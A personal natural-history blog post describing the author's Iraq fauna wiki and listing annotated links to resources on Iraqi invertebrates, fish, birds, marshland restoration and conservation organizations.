I wish I knew what was happening at my other site Iraqfauna.wikispaces.com. The unique visitors are going through the roof! My hope is that it will be used primarily by Iraqis to share information on the country's animal biodiversity. So far I've been the only editor, so its not living up to its potential as a collaborative site. I have been working on the Iraq bird list and slowly adding Arabic names and links to both species photos and range maps, where available.
I've also added more links for people to explore. I'll copy them here to give them a wider audience. Remember anyone can edit the Iraqfauna wiki and add to it. All previous versions are saved so don't worry about wrecking anything.
------------------------------------------------------------------------------------------------
Iraq Natural History Links from iraqfauna.wikispaces.com
INVERTEBRATES
Longhorn Beetles (Cerambycidae) of the Western Palearctic - Michal Hoskovek and Martin Rejzek of the Czech Republic have compiled an illustrated list of the hundreds of species of this large and economically important group of beetles. Their site also has field trip reports from Iran, Syria and Turkey. A very impressive site.
The Sphingidae of the Western Palearctic - Tony Pittaway's comprehensive site covering all the Hawkmoths of the region. Detailed species pages have photos of adults, caterpillars and sometimes parasitoids. An excellent resource.
Scorpions of Iraq - A pictorial introduction to the species of scorpions in Iraq by Norwegian scorpion researcher Jan Ove Rein.
FISH
FISHBASE - List of Fish of Iraq This incredible resource has over 1000 collaborators and has a huge amount of info on Iraqi Fish derived from their database. Info includes pictures, bibliography, collection data.
Freshwater Fishes of Iraq - A project of Brian W. Coad, a scientist at the Canadian Museum of Nature in Ottawa. In addition to a great picture of a large Tigris Salmon (Barbus esocinus), this site has the most authoritative species list, a list of Arabic fish names and a huge bibliography of over 1500 entries.
BIRDS
Laura Erikson's Birderblog - Iraq Species Gallery - A selection of bird photos taken in Iraq by US military and civilians sent to Laura Erikson who runs Birderblog.
Birding Babylon - Natural history notes from Iraq. Started in March 2004 when Jonathan Trouern-Trend deployed to Iraq with the US Army.
Birdlife International's Important Bird Areas in Iraq - Link to descriptions and map pages of areas identified as IBAs in Iraq.
Birds of the Western Palearctic - Maps for all the birds on the Western Palearctic list. Iraq is on the far eastern border of the region.
Birds of Kuwait - Part of Abdul-Rahman Al-Sirhan's fantastic site on the wildlife of Kuwait. He has spent the last few years photographing and documenting the fauna of Kuwait and has a large number of great photos. Most bird species found in Kuwait can also be found in parts of Iraq. Google's Arabic-English translation tool can be used read the Arabic parts of the website.
Environmental Organizations working in Iraq
Birdlife International
Canada-Iraq Marshlands Initiative
Eden Again/Iraq Nature
Iraq Nature Conservation Association
UN Environmental Program - Marshlands Project
Iraqi Marshlands Observation System - a collaborative project that uses satellite imagery and landcover analysis to document the restoration of the Mesopotamian Marshes in Southern Iraq. Includes weekly imagery. April 2006 - Marsh Vegetation at 58% of pre-drainage levels - In March 2003 the marshes were down to approximately 7% of historic levels.
Academic and Governmental Organizations
Ministry of Environment - English language website for the Iraqi Ministry of Environment in Baghdad.
University of Basrah Marine Science Center - An institution devoted to studying the study of the biology and environment of the southern Iraqi Marshes, the Shatt Al-Arab and the Arabian Gulf. Publishes a newsletter and the Journals Marina Mesopotamica and the Journal of Aquaculture.
Subscribe to:
Posts (Atom)
